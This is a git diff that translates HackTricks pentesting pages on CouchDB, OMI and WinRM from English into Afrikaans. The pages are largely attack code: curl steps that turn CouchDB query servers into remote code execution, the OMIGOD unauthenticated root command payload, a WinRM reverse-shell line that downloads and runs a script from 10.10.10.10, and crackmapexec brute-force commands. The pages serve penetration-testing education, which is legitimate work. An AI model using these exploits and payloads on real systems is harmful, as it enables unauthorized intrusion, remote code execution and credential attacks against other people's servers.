uitbuiting onder spesifieke omstandighede, veral die vereiste vir skryftoegang tot die `local.ini` lêer. Die voorsiene kodevoorbeelde en prosedurele stappe bied 'n duidelike gids vir die herhalings van die uitbuiting in 'n beheerde omgewing. -This exploration confirms the viability of CVE-2018-8007 exploitation under specific conditions, notably the requirement for writable access to the `local.ini` file. The provided code examples and procedural steps offer a clear guide for replicating the exploit in a controlled environment. +Vir meer besonderhede oor CVE-2018-8007, verwys na die advies deur mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/). -For more details on CVE-2018-8007, refer to the advisory by mdsec: [CVE-2018-8007](https://www.mdsec.co.uk/2018/08/advisory-cve-2018-8007-apache-couchdb-remote-code-execution/). +### **Verkenning van CVE-2017-12636 met Skryftoestemmings op local.ini** -### **Exploring CVE-2017-12636 with Write Permissions on local.ini** - -Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). - -A vulnerability known as CVE-2017-12636 was explored, which enables code execution via the CouchDB process, although specific configurations may prevent its exploitation. Despite numerous Proof of Concept (POC) references available online, adjustments are necessary to exploit the vulnerability on CouchDB version 2, differing from the commonly targeted version 1.x. The initial steps involve verifying the CouchDB version and confirming the absence of the expected query servers path: +Voorbeeld [van hier](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). +'n Kwesbaarheid bekend as CVE-2017-12636 is ondersoek, wat kodering moontlik maak via die CouchDB-proses, alhoewel spesifieke konfigurasies die uitbuiting kan voorkom. Ten spyte van talle Proof of Concept (POC) verwysings wat aanlyn beskikbaar is, is aanpassings nodig om die kwesbaarheid op CouchDB-weergawe 2 uit te buit, wat verskil van die algemeen geteikende weergawe 1.x. Die aanvanklike stappe behels die verifieer van die CouchDB-weergawe en die bevestiging van die afwesigheid van die verwagte vraagbedienerpad: ```bash curl http://localhost:5984 curl http://0xdf:df@localhost:5984/_config/query_servers/ ``` - -To accommodate CouchDB version 2.0, a new path is utilized: - +Om CouchDB-weergawe 2.0 te akkommodeer, word 'n nuwe pad gebruik: ```bash curl 'http://0xdf:df@localhost:5984/_membership' curl http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers ``` - -Attempts to add and invoke a new query server were met with permission-related errors, as indicated by the following output: - +Pogings om 'n nuwe navraagbediener by te voeg en aan te roep, is ontmoet met toestemmingsverwante foute, soos aangedui deur die volgende uitset: ```bash curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' ``` - -Further investigation revealed permission issues with the `local.ini` file, which was not writable. By modifying the file permissions with root or homer access, it became possible to proceed: - +Verdere ondersoek het toestemmingsprobleme met die `local.ini`-lêer aan die lig gebring, wat nie skryfbaar was nie. Deur die lêerregte te wysig met root- of homer-toegang, was dit moontlik om voort te gaan: ```bash cp /home/homer/etc/local.ini /home/homer/etc/local.ini.b chmod 666 /home/homer/etc/local.ini ``` - -Subsequent attempts to add the query server succeeded, as demonstrated by the lack of error messages in the response. The successful modification of the `local.ini` file was confirmed through file comparison: - +Daaropvolgende pogings om die navraagbediener by te voeg, was suksesvol, soos gedemonstreer deur die afwesigheid van foutboodskappe in die respons. Die suksesvolle wysiging van die `local.ini`-lêer is bevestig deur lêervergelyking: ```bash curl -X PUT 'http://0xdf:df@localhost:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"/sbin/ifconfig > /tmp/df"' ``` - -The process continued with the creation of a database and a document, followed by an attempt to execute code via a custom view mapping to the newly added query server: - +Die proses het voortgegaan met die skep van 'n databasis en 'n dokument, gevolg deur 'n poging om kode uit te voer deur middel van 'n aangepaste aansig wat gekoppel is aan die nuut toegevoegde navraagbediener: ```bash curl -X PUT 'http://0xdf:df@localhost:5984/df' curl -X PUT 'http://0xdf:df@localhost:5984/df/zero' -d '{"_id": "HTP"}' curl -X PUT 'http://0xdf:df@localhost:5984/df/_design/zero' -d '{"_id": "_design/zero", "views": {"anything": {"map": ""} }, "language": "cmd"}' ``` +'n **[opsomming](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** met 'n alternatiewe lading bied verdere insigte in die uitbuiting van CVE-2017-12636 onder spesifieke omstandighede. **Nuttige hulpbronne** vir die uitbuiting van hierdie kwesbaarheid sluit in: -A **[summary](https://github.com/carlospolop/hacktricks/pull/116/commits/e505cc2b557610ef5cce09df6a14b10caf8f75a0)** with an alternative payload provides further insights into exploiting CVE-2017-12636 under specific conditions. **Useful resources** for exploiting this vulnerability include: - -- [POC exploit code](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py) -- [Exploit Database entry](https://www.exploit-db.com/exploits/44913/) +- [POC uitbuitingskode](https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py) +- [Exploit Database inskrywing](https://www.exploit-db.com/exploits/44913/) ## Shodan * `port:5984 couchdb` -## References +## Verwysings * [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html) * [https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution](https://0xdf.gitlab.io/2018/09/15/htb-canape.html#couchdb-execution)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien jou **maatskappy geadverteer in HackTricks** of **HackTricks aflaai in PDF** Kyk die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/5985-5986-pentesting-omi.md b/network-services-pentesting/5985-5986-pentesting-omi.md index 3204956bc..7bb76eb2a 100644 --- a/network-services-pentesting/5985-5986-pentesting-omi.md +++ b/network-services-pentesting/5985-5986-pentesting-omi.md @@ -2,19 +2,19 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
-### **Basic Information** +### **Basiese Inligting** -**OMI** is presented as an **[open-source](https://github.com/microsoft/omi)** tool by Microsoft, designed for remote configuration management. It's particularly relevant for Linux servers on Azure that utilize services such as: +**OMI** word aangebied as 'n **[open-source](https://github.com/microsoft/omi)**-instrument deur Microsoft, ontwerp vir afstandsbeheer van konfigurasie. Dit is veral relevant vir Linux-bedieners op Azure wat dienste soos gebruik: - **Azure Automation** - **Azure Automatic Update** @@ -23,43 +23,41 @@ - **Azure Configuration Management** - **Azure Diagnostics** -The process `omiengine` is initiated and listens on all interfaces as root when these services are activated. +Die proses `omiengine` word geïnisieer en luister op alle koppelvlakke as root wanneer hierdie dienste geaktiveer word. -**Default ports** used are **5985** (http) and **5986** (https). +**Verstekpoorte** wat gebruik word, is **5985** (http) en **5986** (https). -### **[CVE-2021-38647 Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)** +### **[CVE-2021-38647 Swakplek](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647)** -As observed on September 16, Linux servers deployed in Azure with the mentioned services are susceptible due to a vulnerable version of OMI. This vulnerability lies in the OMI server's handling of messages through the `/wsman` endpoint without requiring an Authentication header, incorrectly authorizing the client. - -An attacker can exploit this by sending an "ExecuteShellCommand" SOAP payload without an Authentication header, compelling the server to execute commands with root privileges. +Soos waargeneem op 16 September, is Linux-bedieners wat in Azure geïmplementeer is met die genoemde dienste vatbaar as gevolg van 'n kwesbare weergawe van OMI. Hierdie kwesbaarheid lê in die OMI-bediener se hantering van boodskappe deur die `/wsman` eindpunt sonder 'n Verifikasie-heer, wat die kliënt verkeerd magtig. +'n Aanvaller kan dit uitbuit deur 'n "ExecuteShellCommand" SOAP-lading sonder 'n Verifikasie-heer te stuur, wat die bediener dwing om opdragte met root-voorregte uit te voer. ```xml - - id - 0 - - +... + + +id +0 + + ``` +Vir meer inligting oor hierdie CVE **[kyk hier](https://github.com/horizon3ai/CVE-2021-38647)**. -For a more information about this CVE **[check this](https://github.com/horizon3ai/CVE-2021-38647)**. - -## References +## Verwysings * [https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/](https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/) * [https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/](https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/5985-5986-pentesting-winrm.md b/network-services-pentesting/5985-5986-pentesting-winrm.md index 454ac692a..48d4485df 100644 --- a/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -2,114 +2,116 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hack-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbounties wat begin en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! ## WinRM -[Windows Remote Management (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) is highlighted as a **protocol by Microsoft** that enables the **remote management of Windows systems** through HTTP(S), leveraging SOAP in the process. It's fundamentally powered by WMI, presenting itself as an HTTP-based interface for WMI operations. +[Windows Remote Management (WinRM)](https://msdn.microsoft.com/en-us/library/windows/desktop/aa384426\(v=vs.85\).aspx) word uitgelig as 'n **protokol deur Microsoft** wat die **afstandsbestuur van Windows-stelsels** deur middel van HTTP(S) moontlik maak, met behulp van SOAP in die proses. Dit word fundamenteel aangedryf deur WMI en bied 'n HTTP-gebaseerde koppelvlak vir WMI-operasies. -The presence of WinRM on a machine allows for straightforward remote administration via PowerShell, akin to how SSH works for other operating systems. To determine if WinRM is operational, checking for the opening of specific ports is recommended: +Die teenwoordigheid van WinRM op 'n masjien maak dit moontlik vir eenvoudige afstandsadministrasie via PowerShell, soortgelyk aan hoe SSH werk vir ander bedryfstelsels. Om vas te stel of WinRM operasioneel is, word aanbeveel om te kyk of spesifieke poorte oopgemaak is: * **5985/tcp (HTTP)** * **5986/tcp (HTTPS)** -An open port from the list above signifies that WinRM has been set up, thus permitting attempts to initiate a remote session. +'n Oop poort van die lys hierbo beteken dat WinRM opgestel is en dus pogings toelaat om 'n afstandsverbinding te begin. -### **Initiating a WinRM Session** - -To configure PowerShell for WinRM, Microsoft's `Enable-PSRemoting` cmdlet comes into play, setting up the computer to accept remote PowerShell commands. With elevated PowerShell access, the following commands can be executed to enable this functionality and designate any host as trusted: +### **Die begin van 'n WinRM-sessie** +Om PowerShell te konfigureer vir WinRM, kom Microsoft se `Enable-PSRemoting` cmdlet in die prentjie, wat die rekenaar opstel om afstands-PowerShell-opdragte te aanvaar. Met verhoogde toegang tot PowerShell kan die volgende opdragte uitgevoer word om hierdie funksionaliteit in te skakel en enige gasheer as betroubaar aan te dui: ```powershell -Enable-PSRemoting -Force -Set-Item wsman:\localhost\client\trustedhosts * +Enable-PSRemoting -Force +Set-Item wsman:\localhost\client\trustedhosts * ``` +Hierdie benadering behels die byvoeging van 'n wildkaart by die `trustedhosts`-konfigurasie, 'n stap wat versigtige oorweging vereis as gevolg van die implikasies daarvan. Dit word ook opgemerk dat dit moontlik nodig kan wees om die netwerk tipe van "Public" na "Work" te verander op die aanvaller se masjien. -This approach involves adding a wildcard to the `trustedhosts` configuration, a step that requires cautious consideration due to its implications. It's also noted that altering the network type from "Public" to "Work" might be necessary on the attacker's machine. - -Moreover, WinRM can be **activated remotely** using the `wmic` command, demonstrated as follows: - +Verder kan WinRM **afstandaktivering** gebruik deur die `wmic`-opdrag, soos volg, te demonstreer: ```powershell wmic /node: process call create "powershell enable-psremoting -force" ``` - -This method allows for the remote setup of WinRM, enhancing the flexibility in managing Windows machines from afar. +Hierdie metode maak dit moontlik om WinRM vanaf 'n afstand op te stel, wat die buigsaamheid in die bestuur van Windows-masjiene verbeter. -### Test if configured +### Toets of dit gekonfigureer is -To verify the setup of your attack machine, the `Test-WSMan` command is utilized to check if the target has WinRM configured properly. By executing this command, you should expect to receive details concerning the protocol version and wsmid, indicating successful configuration. Below are examples demonstrating the expected output for a configured target versus an unconfigured one: - -- For a target that **is** properly configured, the output will look similar to this: +Om die opset van jou aanvalsmasjien te verifieer, word die `Test-WSMan`-opdrag gebruik om te kyk of die teiken WinRM korrek gekonfigureer het. Deur hierdie opdrag uit te voer, kan jy verwag om besonderhede oor die protokolweergawe en wsmid te ontvang, wat suksesvolle konfigurasie aandui. Hieronder is voorbeelde wat die verwagte uitset vir 'n gekonfigureerde teiken teenoor 'n ongekonfigureerde een demonstreer: +- Vir 'n teiken wat **korrek** gekonfigureer is, sal die uitset soortgelyk lyk aan die volgende: ```bash Test-WSMan ``` - -The response should contain information about the protocol version and wsmid, signifying that WinRM is set up correctly. +Die reaksie moet inligting bevat oor die protokolweergawe en wsmid, wat aandui dat WinRM korrek opgestel is. ![](<../.gitbook/assets/image (161) (1).png>) -- Conversely, for a target **not** configured for WinRM, the would result in no such detailed information, highlighting the absence of a proper WinRM setup. +- Omgekeerd, vir 'n teiken wat **nie** vir WinRM opgestel is nie, sal daar geen sulke gedetailleerde inligting wees nie, wat die afwesigheid van 'n korrekte WinRM-opstelling beklemtoon. ![](<../.gitbook/assets/image (162).png>) -### Execute a command - -To execute `ipconfig` remotely on a target machine and view its output do: +### Voer 'n bevel uit +Om `ipconfig` op 'n teikenrekenaar uit te voer en die uitset te sien, doen die volgende: ```powershell Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username] ``` - ![](<../.gitbook/assets/image (163) (1).png>) -You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do: - +Jy kan ook **'n bevel van jou huidige PS-konsole uitvoer** deur gebruik te maak van _**Invoke-Command**_. Stel dat jy plaaslik 'n funksie genaamd _**enumeration**_ het en jy wil dit op 'n afgeleë rekenaar uitvoer, kan jy dit doen: ```powershell Invoke-Command -ComputerName -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"] ``` +### Voer 'n Skrip uit -### Execute a Script +Om 'n skrip uit te voer op 'n Windows Remote Management (WinRM) diens, kan jy die volgende stappe volg: +1. Verbind na die doelwitbediener met behulp van 'n WinRM-kliënt soos `winrs` of `Enter-PSSession`. +2. Skep 'n nuwe skripslêer op die doelwitbediener met die gewenste skriptekode. +3. Voer die skrip uit deur die pad na die skripslêer op te gee, byvoorbeeld `.\skripsnaam.ps1`. + +Dit sal die skrip op die doelwitbediener uitvoer en die resultate terugstuur na jou WinRM-kliënt. Onthou om die nodige toestemmings en regte te hê om skripte op die doelwitbediener uit te voer. ```powershell Invoke-Command -ComputerName -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta] ``` +### Kry 'n omgekeerde dop -### Get reverse-shell +Om 'n omgekeerde dop te kry, kan jy die volgende stappe volg: +1. Skep 'n omgekeerde dop-skripsie wat sal hardloop op die doelwitbediener. Hierdie skripsie moet 'n verbinding maak met jou aanvalsmasjien en 'n omgekeerde dop daarop vestig. +2. Stuur die omgekeerde dop-skripsie na die doelwitbediener. Dit kan gedoen word deur dit te laai op 'n webwerf, dit as 'n e-posbylaag te stuur of dit op 'n ander manier op die doelwitbediener te plaas. +3. Wanneer die doelwitbediener die omgekeerde dop-skripsie uitvoer, sal dit 'n verbinding maak met jou aanvalsmasjien en 'n omgekeerde dop daarop vestig. +4. Jy kan nou op afstand die doelwitbediener se stelsel beheer deur die omgekeerde dop te gebruik. + +Dit is belangrik om te onthou dat die gebruik van omgekeerde dopskripsies om toegang tot stelsels te verkry sonder toestemming onwettig is en 'n oortreding van die wet kan wees. Dit moet slegs gedoen word in 'n wettige en etiese pentesting-konteks. ```powershell Invoke-Command -ComputerName -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"} ``` +### Kry 'n PS-sessie -### Get a PS session - -To get an interactive PowerShell shell use `Enter-PSSession`: - +Om 'n interaktiewe PowerShell-skaal te kry, gebruik `Enter-PSSession`: ```powershell #If you need to use different creds $password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force @@ -120,29 +122,25 @@ $creds2=New-Object System.Management.Automation.PSCredential(".\student41", $pas Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username] ## Bypass proxy Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) -# Save session in var +# Save session in var $sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer) Enter-PSSession $sess ## Background current PS session Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...) ``` - ![](<../.gitbook/assets/image (164).png>) -**The session will run in a new process (wsmprovhost) inside the "victim"** +**Die sessie sal in 'n nuwe proses (wsmprovhost) binne die "slagoffer" loop** -### **Forcing WinRM Open** - -To use PS Remoting and WinRM but the computer isn't configured, you could enable it with: +### **WinRM Oop Forseer** +Om PS Remoting en WinRM te gebruik, maar as die rekenaar nie gekonfigureer is nie, kan jy dit aktiveer met: ```powershell .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force" ``` +### Stoor en Herstel sessies -### Saving and Restoring sessions - -This **won't work** if the the **language** is **constrained** in the remote computer. - +Dit **sal nie werk** as die **taal** beperk is op die afgeleë rekenaar nie. ```powershell #If you need to use different creds $password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force @@ -154,47 +152,41 @@ $sess1 = New-PSSession -ComputerName [-SessionOption (New-PSSessi #And restore it at any moment doing Enter-PSSession -Session $sess1 ``` - -Inside this sessions you can load PS scripts using _Invoke-Command_ - +Binne hierdie sessies kan jy PS-skripte laai deur gebruik te maak van _Invoke-Command_. ```powershell Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1 ``` +### Foute -### Errors +As jy die volgende fout vind: -If you find the following error: - -`enter-pssession : Connecting to remote server 10.10.10.175 failed with the following error message : The WinRM client cannot process the request. If the authentication scheme is different from Kerberos, or if the client computer is not joined to a domain, then HTTPS transport must be used or the destination machine must be added to the TrustedHosts configuration setting. Use winrm.cmd to configure TrustedHosts. Note that computers in the TrustedHosts list might not be authenticated. You can get more information about that by running the following command: winrm help config. For more information, see the about_Remote_Troubleshooting Help topic.` - -The try on the client (info from [here](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)): +`enter-pssession : Verbinding met afgeleë bediener 10.10.10.175 het misluk met die volgende foutboodskap: Die WinRM-kliënt kan nie die versoek verwerk nie. As die verifikasieskema verskil van Kerberos, of as die kliëntrekenaar nie by 'n domein aangesluit is nie, moet HTTPS-vervoer gebruik word of die bestemmingsmasjien moet by die TrustedHosts-konfigurasie-instelling gevoeg word. Gebruik winrm.cmd om TrustedHosts te konfigureer. Let daarop dat rekenaars in die TrustedHosts-lys nie noodwendig geverifieer word nie. Jy kan meer inligting daaroor kry deur die volgende opdrag uit te voer: winrm help config. Vir meer inligting, sien die about_Remote_Troubleshooting Help-onderwerp.` +Probeer die volgende op die kliënt (inligting van [hier](https://serverfault.com/questions/657918/remote-ps-session-fails-on-non-domain-server)): ```ruby winrm quickconfig winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}' ``` -
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Real-Time Hack Nuus**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagte wat begin en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## WinRM connection in linux +## WinRM-verbinding in Linux ### Brute Force -Be careful, brute-forcing winrm could block users. - +Wees versigtig, brute force-aanvalle op WinRM kan gebruikers blokkeer. ```ruby #Brute force crackmapexec winrm -d -u usernames.txt -p passwords.txt @@ -206,41 +198,68 @@ crackmapexec winrm -d -u -p -x "whoami" crackmapexec winrm -d -u -H -X '$PSVersionTable' #Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm ``` +### Gebruik van evil-winrm -### Using evil-winrm +`evil-winrm` is 'n nuttige hulpmiddel wat gebruik kan word vir die pentesting van Windows Remote Management (WinRM)-dienste. Hierdie hulpmiddel maak dit moontlik om aan te meld by 'n Windows-masjien en uitvoering van verskeie operasies uit te voer, soos die verkryging van inligting, uitvoering van opdragte en die oplaai van lêers. +Om `evil-winrm` te gebruik, volg die volgende stappe: + +1. Installeer die `evil-winrm`-hulpmiddel op jou stelsel. +2. Voer die volgende opdrag in om aan te meld by die doelwitstelsel: `evil-winrm -i -u -p `. +3. As die aanmelding suksesvol is, sal jy 'n interaktiewe skootrekenaar ontvang waar jy opdragte kan uitvoer. +4. Gebruik die verskillende opdragte om inligting te verkry, lêers op te laai of uit te voer, en ander operasies uit te voer. + +Dit is belangrik om te onthou dat die gebruik van `evil-winrm` slegs toegelaat word op stelsels waarvoor jy die regte toestemming het om dit te doen. Wees verantwoordelik en gebruik hierdie hulpmiddel slegs vir wettige doeleindes. ```ruby gem install evil-winrm ``` - -Read **documentation** on its github: [https://github.com/Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm) - +Lees die **dokumentasie** op sy github: 